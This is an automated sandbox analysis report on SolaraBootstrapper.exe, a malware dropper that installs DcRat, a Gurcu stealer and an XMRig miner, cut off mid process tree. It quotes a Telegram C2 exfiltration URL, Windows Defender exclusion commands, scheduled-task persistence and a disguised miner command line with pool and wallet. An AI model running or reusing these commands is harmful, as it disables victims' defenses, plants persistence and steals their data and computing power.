Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-07-2024 09:06

General

  • Target

    SolaraBootstrapper.exe

  • Size

    9.5MB

  • MD5

    4050f2027e946d524e3a1078a6cd5419

  • SHA1

    698f02a2826e7d6ecfebf37b04f0231c904133eb

  • SHA256

    2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

  • SHA512

    fed614ebd8197c8809d32e0437dd49fd87640d3fbe0ae806479e79f2480975e404306821c43e726b55d17c02298bb088175ee079bc88d8a8fe942f3d4cd9afab

  • SSDEEP

    196608:HE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5nQ:HE9B0OjrdLK4J/FQ

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202027d0590240ae963ed60c69b89150f7a90f1acc%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20EPDFAWZF%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CWindowsRE%5Cconhost.ex

Signatures

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 22 IoCs
  • Process spawned unexpected child process 63 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • DCRat payload 8 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 39 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 43 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 35 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
      "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Users\Admin\AppData\Local\Temp\Result.exe
        "C:\Users\Admin\AppData\Local\Temp\Result.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
          "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3948
          • C:\Windows\SysWOW64\msiexec.exe
            "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4868
          • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
            "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
            5⤵
            • Executes dropped EXE
            PID:4452
            • C:\Windows\Temp\{F6E26849-88DD-43A2-9048-146595515CD6}\.cr\vc_redist.x64.exe
              "C:\Windows\Temp\{F6E26849-88DD-43A2-9048-146595515CD6}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=684 -burn.filehandle.self=688 /install /quiet /norestart
              6⤵
              • Executes dropped EXE
              PID:7124
        • C:\Users\Admin\AppData\Local\Temp\solara.exe
          "C:\Users\Admin\AppData\Local\Temp\solara.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1964
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1516
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4636
              • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                7⤵
                • Modifies WinLogon for persistence
                • Checks computer location settings
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4196
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1944
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\de-DE\SolaraBootstrapper.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2056
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\spoolsv.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2668
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Favorites\Links\wininit.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4704
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Registry.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:552
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\fontdrvhost.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4100
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:396
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Raga\services.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3516
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3668
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\dllhost.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4200
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\System.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4796
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\WmiPrvSE.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4964
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\SearchApp.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3568
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\SolaraBootstrapper.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2008
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemResources\Windows.UI.SettingsHandlers-nt\pris\msiexec.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2428
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\wscript.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3208
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\conhost.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3552
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\msiexec.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2104
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\dwm.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5116
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\sddsfsdf.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2824
                • C:\Recovery\WindowsRE\conhost.exe
                  "C:\Recovery\WindowsRE\conhost.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5044
      • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
        "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3720
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
          4⤵
          • Checks computer location settings
          PID:2872
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
            5⤵
              PID:5460
              • C:\winNet\ComContainerbrowserRefRuntime.exe
                "C:\winNet/ComContainerbrowserRefRuntime.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies registry class
                PID:2732
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VXDFbwM7eT.bat"
                  7⤵
                    PID:5180
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      8⤵
                        PID:6072
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        8⤵
                          PID:624
                        • C:\Program Files\7-Zip\System.exe
                          "C:\Program Files\7-Zip\System.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:5588
              • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                3⤵
                • Executes dropped EXE
                PID:2028
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                  4⤵
                    PID:5700
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                      5⤵
                        PID:5876
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:5252
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:5512
                      • C:\Windows\System32\cmd.exe
                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                        5⤵
                          PID:5124
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                            6⤵
                              PID:3500
                          • C:\Windows\System32\cmd.exe
                            "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                            5⤵
                              PID:6860
                              • C:\Users\Admin\Bloxstrap.exe
                                C:\Users\Admin\Bloxstrap.exe
                                6⤵
                                • Executes dropped EXE
                                PID:6908
                                • C:\Windows\System32\conhost.exe
                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                                  7⤵
                                  • Suspicious use of SetThreadContext
                                  PID:5388
                                  • C:\Windows\System32\cmd.exe
                                    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                    8⤵
                                      PID:6340
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:3904
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:5144
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:6652
                                      • C:\Windows\System32\conhost.exe
                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                        9⤵
                                          PID:6012
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                        8⤵
                                          PID:7084
                              • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                                "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious use of WriteProcessMemory
                                PID:4964
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                                  4⤵
                                  • Checks computer location settings
                                  PID:4048
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                                    5⤵
                                      PID:4944
                                      • C:\DriversavessessionDlldhcp\Roblox.exe
                                        "C:\DriversavessessionDlldhcp/Roblox.exe"
                                        6⤵
                                        • Modifies WinLogon for persistence
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Adds Run key to start application
                                        • Modifies registry class
                                        PID:5660
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dbmfxl0z\dbmfxl0z.cmdline"
                                          7⤵
                                          • Loads dropped DLL
                                          PID:4148
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0EA.tmp" "c:\DriversavessessionDlldhcp\CSCC0F69E47C594F6083F596A57C449276.TMP"
                                            8⤵
                                              PID:244
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ge4mpa2\0ge4mpa2.cmdline"
                                            7⤵
                                            • Loads dropped DLL
                                            PID:2884
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE167.tmp" "c:\Program Files\7-Zip\Lang\CSCF7781733BB6F4C9AA32A48A8BF739FBB.TMP"
                                              8⤵
                                                PID:5884
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kg21drzx\kg21drzx.cmdline"
                                              7⤵
                                              • Loads dropped DLL
                                              PID:5652
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE1E4.tmp" "c:\Users\Admin\Favorites\Links\CSC38749302875541F9BBED863ED7EC73E5.TMP"
                                                8⤵
                                                  PID:5800
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d3f1wpfs\d3f1wpfs.cmdline"
                                                7⤵
                                                • Loads dropped DLL
                                                PID:4384
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE271.tmp" "c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\CSCBF40B8DB9BF474087AECFBA566C2BE2.TMP"
                                                  8⤵
                                                    PID:5788
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sotdh5yo\sotdh5yo.cmdline"
                                                  7⤵
                                                  • Loads dropped DLL
                                                  PID:388
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2EE.tmp" "c:\Users\Default User\CSC98D446F3628C46F1A753B818DA82AEC7.TMP"
                                                    8⤵
                                                      PID:3568
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vudgovgm\vudgovgm.cmdline"
                                                    7⤵
                                                    • Loads dropped DLL
                                                    PID:536
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE37A.tmp" "c:\Users\Default User\CSC4D45D60114A543128A039922A33C2B.TMP"
                                                      8⤵
                                                        PID:2272
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dwccfvgb\dwccfvgb.cmdline"
                                                      7⤵
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      PID:4704
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3F7.tmp" "c:\Windows\Media\Raga\CSCF61AD5F37F6742188DDB3B33DD32B7A9.TMP"
                                                        8⤵
                                                          PID:4876
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hm2anacp\hm2anacp.cmdline"
                                                        7⤵
                                                        • Loads dropped DLL
                                                        PID:5784
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                          • Loads dropped DLL
                                                          PID:3160
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE484.tmp" "c:\Users\Default User\CSC2AF830768BB54558BFFBD619264A34FD.TMP"
                                                          8⤵
                                                            PID:3972
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\duu2byyi\duu2byyi.cmdline"
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:1272
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE520.tmp" "c:\Program Files\Google\CSC307BC8A6232A4BEFBDBC4ED85FBCCF1.TMP"
                                                            8⤵
                                                              PID:3904
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g11xl0nh\g11xl0nh.cmdline"
                                                            7⤵
                                                            • Loads dropped DLL
                                                            PID:1468
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE59D.tmp" "c:\Users\Public\Music\CSCE2FB8A03672946B8A9611F2C4AA28AB.TMP"
                                                              8⤵
                                                                PID:5748
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\il5lrtmb\il5lrtmb.cmdline"
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Drops file in Windows directory
                                                              PID:448
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
